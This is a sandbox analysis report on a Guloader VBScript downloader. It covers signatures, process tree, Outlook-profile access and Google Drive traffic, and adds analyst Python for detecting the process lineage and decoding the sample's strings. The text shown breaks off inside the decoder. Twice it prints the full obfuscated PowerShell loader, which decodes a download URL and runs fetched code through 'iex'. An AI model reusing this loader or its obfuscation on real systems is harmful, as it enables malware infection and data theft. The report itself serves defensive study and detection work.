Analysis

max time kernel: 156s
max time network: 152s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 29/03/2024, 02:11

Static task: static1

Behavioral task: behavioral1
  Sample: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
  Resource: win10v2004-20231215-en
General

Target: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Size: 179KB
MD5: 9cc4d241f55c4430d7ca7245c585253e
SHA1: 64497621d3145749d5d5b284448f8d7f90aa3e29
SHA256: 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
SHA512: 4a058df7f657a75287b4d2a5a238469a83df4f160e246ea2240eedcf01bbf3d216a304e6cf0dba218c7a922099e60637e5650fe7f8037d350545939d0168f8f3
SSDEEP: 3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyc:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVR
Malware Config

Signatures

Guloader,Cloudeye
  A shellcode based downloader first seen in 2020.

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  3     2820  WScript.exe

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description  ioc                                                                                                                                      Process
  Key opened   \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook                      wab.exe
  Key opened   \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook                      wab.exe
  Key opened   \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook   wab.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow  ioc
  6     drive.google.com
  7     drive.google.com
  13    drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  pid   Process
  2488  wab.exe
  2488  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  1756  powershell.exe
  2488  wab.exe

Suspicious use of SetThreadContext (1 IoC)
  description                          pid   Process         procid_target
  PID 1756 set thread context of 2488  1756  powershell.exe  35

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  1388  powershell.exe
  1756  powershell.exe
  1756  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  1756  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1388  powershell.exe
  Token: SeDebugPrivilege  1756  powershell.exe
  Token: SeDebugPrivilege  2488  wab.exe

Suspicious use of WriteProcessMemory (20 IoCs; identical rows collapsed, count in the last column)
  description                       pid   Process         procid_target  count
  PID 2820 wrote to memory of 1388  2820  WScript.exe     27             3
  PID 1388 wrote to memory of 2244  1388  powershell.exe  29             3
  PID 1388 wrote to memory of 1756  1388  powershell.exe  31             4
  PID 1756 wrote to memory of 2332  1756  powershell.exe  32             4
  PID 1756 wrote to memory of 2488  1756  powershell.exe  35             6

outlook_office_path (1 IoC)
  description  ioc                                                                                                                 Process
  Key opened   \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook   wab.exe

outlook_win_path (1 IoC)
  description  ioc                                                                                                                                      Process
  Key opened   \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook   wab.exe
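The WriteProcessMemory and SetThreadContext tables above give the parent/child relations of this run: WScript.exe (2820) writes into a 64-bit powershell.exe (1388), which spawns a 32-bit SysWOW64 powershell.exe (1756) that writes into, and sets the thread context of, wab.exe (2488), the Windows Mail address-book binary the loader uses as its host. Each powershell.exe also spawns a cmd.exe whose only job is `set /A 115^^0`, the arithmetic the script uses to obtain 115 (the code point of `s`). The following Python is an added example, not sandbox output and not a rule shipped by any product: it walks constructed process-creation events that mirror the tree in the Processes section and flags (a) a wab.exe whose ancestry passes through powershell.exe back to a script host and (b) cmd.exe children of powershell.exe that only evaluate `set /A`. The field names, the `Proc` record, and the script-host list are assumptions.

```python
"""Process-lineage check for the tree shown in this report.

Added example: the events below are constructed from the PIDs, images and
parent/child relations the report lists; they are not sandbox output and the
check is not a rule from any product. Field names are assumptions.
"""
from collections import namedtuple
import ntpath

Proc = namedtuple("Proc", "pid ppid image cmdline")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # assumption: script hosts worth flagging
INJECTION_HOST = "wab.exe"                      # the host this report shows

# Constructed process-creation events mirroring the report's process tree.
# The long PowerShell command lines are abbreviated to the part the check needs.
SAMPLE_EVENTS = [
    Proc(2820, None, r"C:\Windows\System32\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"'),
    Proc(1388, 2820, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#...#>;$Duefalks=(cmd /c set /A 115^^0);..."'),
    Proc(2244, 1388, r"C:\Windows\system32\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c set /A 115^^0'),
    Proc(1756, 1388, r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#...#>;$Duefalks=(cmd /c set /A 115^^0);..."'),
    Proc(2332, 1756, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c set /A 115^^0'),
    Proc(2488, 1756, r"C:\Program Files (x86)\windows mail\wab.exe",
         r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]


def _by_pid(events):
    return {e.pid: e for e in events}


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(image).lower()


def lineage(events, pid):
    """Image basenames from `pid` up to the root, or until the parent is unknown."""
    table = _by_pid(events)
    chain, seen = [], set()
    cur = table.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)                      # guard against PID-reuse loops
        chain.append(basename(cur.image))
        cur = table.get(cur.ppid) if cur.ppid is not None else None
    return chain


def script_host_to_injection_host(events):
    """PIDs of wab.exe whose ancestry is one or more powershell.exe under a script host."""
    hits = []
    for e in events:
        chain = lineage(events, e.pid)
        if not chain or chain[0] != INJECTION_HOST:
            continue
        n = 1
        while n < len(chain) and chain[n] == "powershell.exe":
            n += 1                             # allow the 64-bit -> 32-bit relaunch seen here
        if n > 1 and n < len(chain) and chain[n] in SCRIPT_HOSTS:
            hits.append(e.pid)
    return hits


def cmd_arith_oracles(events):
    """PIDs of cmd.exe spawned by powershell.exe whose whole job is `set /A`."""
    table = _by_pid(events)
    hits = []
    for e in events:
        parent = table.get(e.ppid) if e.ppid is not None else None
        if basename(e.image) != "cmd.exe" or parent is None:
            continue
        if basename(parent.image) == "powershell.exe" and "set /a" in e.cmdline.lower():
            hits.append(e.pid)
    return hits


if __name__ == "__main__":
    print("wab.exe under script host:", script_host_to_injection_host(SAMPLE_EVENTS))
    print("cmd.exe set /A oracles:   ", cmd_arith_oracles(SAMPLE_EVENTS))
```

The lineage walk tolerates any number of consecutive powershell.exe ancestors because this sample relaunches itself from the 32-bit host before injecting; a rule that only looks one parent up would see powershell.exe -> wab.exe and miss the script-host origin.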
Processes

[1] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
    PID: 2820
    Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (parent PID 2820)
      Command line (obfuscated PowerShell, reproduced as captured; continues on the following lines):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
      PID: 1388
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe (parent PID 1388)
        Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        PID: 2244
    [3] C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (parent PID 1388; 32-bit relaunch of the same script)
        Command line (obfuscated PowerShell, reproduced as captured; continues on the following lines):
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
        PID: 1756
        Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (parent PID 1756)
          Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
          PID: 2332
      [4] C:\Program Files (x86)\windows mail\wab.exe (parent PID 1756)
          Command line: "C:\Program Files (x86)\windows mail\wab.exe"
          PID: 2488
          Signatures: Accesses Microsoft Outlook profiles; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
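The captured PowerShell carries its own string decoder, and it is short enough to reproduce exactly. `$Duefalks` is the output of `cmd /c set /A 115^^0` (cmd.exe collapses `^^` to `^`, bitwise XOR, so the value is 115, the code point of `s`); `[char]115 + 'ubstring'` builds the method name `substring` without the literal appearing in the script. `Genanvendelsesprocessens` then walks its argument from index 7 in steps of 8, keeping one character per step and stopping before the final character (`Spiderweb` returns `Length-1`), so every decoded character is buried in seven junk characters. `Alfridaric` hands each decoded string to the call operator `&` via `$Forsmdeligheder`, which itself decodes to `iex`. The Python below is an added analyst re-implementation, not the sample's code and not part of the sandbox report; the function names are mine, and the three padded strings are copied verbatim from the first line of the command line above (later strings span the line breaks in the capture and are left out). Run against those strings it yields `Transferring`, `iex`, and a `https://drive.google.com/uc?export=download` URL, consistent with the drive.google.com flows in the Signatures table.

```python
"""Decoder for the string obfuscation used by the PowerShell stage shown above.

Added example: an analyst re-implementation, not the sample's code and not
part of the sandbox report. It mirrors the captured command line:
`set /A 115^^0` -> 115 ('s') -> 'substring'; then keep one character every
8 positions starting at index 7, stopping before the last character.
"""


def cmd_set_a_xor(expr: str) -> int:
    """Evaluate the single cmd.exe arithmetic form the sample uses, `N^^M`.

    cmd.exe turns the escaped `^^` into `^`, which `set /A` treats as bitwise
    XOR. Assumption: this stand-in handles only that form, not general cmd
    arithmetic.
    """
    lhs, rhs = expr.replace("^^", "^").split("^")
    return int(lhs) ^ int(rhs)


def method_name(code_point: int) -> str:
    """$Rygsttte = [char]$Duefalks + 'ubstring'"""
    return chr(code_point) + "ubstring"


def decode(padded: str, start: int = 7, step: int = 8) -> str:
    """Mirror of Genanvendelsesprocessens.

    PowerShell: For($i=start; $i -lt $Hamunds; $i+=step) { .substring($i, 1) }
    where $Hamunds = Length-1, so the final character of the padded string is
    never read.
    """
    limit = len(padded) - 1
    return "".join(padded[i] for i in range(start, limit, step))


# Padded strings copied verbatim from the captured command line (PID 1388 / 1756).
BYRETTERNES248 = 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer '
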